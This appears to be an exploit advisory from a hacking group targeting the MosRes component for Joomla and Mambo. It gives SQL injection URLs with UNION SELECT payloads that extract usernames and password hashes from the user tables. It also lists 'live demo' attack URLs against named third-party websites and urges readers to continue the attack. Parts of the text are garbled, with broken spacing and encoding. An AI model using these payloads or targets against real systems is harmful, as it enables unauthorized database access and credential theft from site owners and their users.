######################################## ###########
[+] Author: Chip D3 Bi0s
[+] Author Name: Russell...
[+] Email: chipdebios [alt + 64] gmail.com
[+] Group: LatinHackTeam
[+] Vulnerability: SQL injection
[+] Google Dork: imagine ;)
[+] Email: chipdebios [alt + 64] gmail.com
######################################## ###########
Conditions: magic_quotes_gpc = Off
---------------------------------------------------
Example Joomla:
Http: // localHost/path/index. php? Option = com_mosres & task = viewproperty & property_uid = [SQL code]
[SQL code]:
Null + and + 1 = 2 + union + select + 1, 2, 3, 4, concat (username, 0x3a, password) ChipD3Bi0s, 6, 7, 8, 9, 10, 11, 12, 13 + from + jos_users /*
Live Demo:
Http://ahtopolbg.com/index.php? Option = com_mosres & catID = 1004 & regID = 2 & task = viewproperty & property_uid = null + and + 1 =
2 + union + select + 1, 2, 4, concat (username, 0x3a, password) ChipD3Bi0s, 6, 7, 8, 9, 10, 11, 12, 13 + from + jos_users /*
---------------------------------------------------
Example Mambo:
Http: // localHost/path/index. php? Option = com_mosres & task = viewproperty & property_uid = [SQL code]
[SQL code]:
Null + and + 1 = 2 + union + select + 1, 2, 3, 4, concat (username, 0x3a, password) ChipD3bi0s, 6, 7, 8, 9, 10, 11, 12, 13 + from + mos_users /*
Live Demo:
Http://www.velingradbg.com/index.php? Option = com_mosres & task = viewproperty & property_uid = 1005% 27% 201 20and % 2% = 20 union % 20 select %, 2, 3, 4, concat (username, 0x3a, password) ChipD3bi0s, 6, 7, 8, 9, 10, 11, 12, 13 + from + mos_users /*
**************************
However, still looking... component, can be injected in several places (not all or always ).
Almost always SQL injection & also blind SQL injection.
I let you work ;)
Http://www.ahtopolbg.com/index.php? Option = com_mosres & task = showregion & regID = 4% 27 + and + 1 = 2 + union % 20 select % 201, concat (username, 0x3a, password) + from + jos_users/* & lang = bg
**************************
++
# [!] Produced in South America
++
<Name> Mos Res </name>
<CreationDate> 23/02/2005 </creationDate>
<Author> Vince Wooll </author>
<Copyright> This component is released under the GNU/GPL License </copyright>
<AuthorEmail> mosres@woollyinwales.co.uk </authorEmail>
<AuthorUrl> http://www.mosres.net </authorUrl>
<Version> 1.0f </version>
<Description> Mambo Resident component for v4.5.2 </description>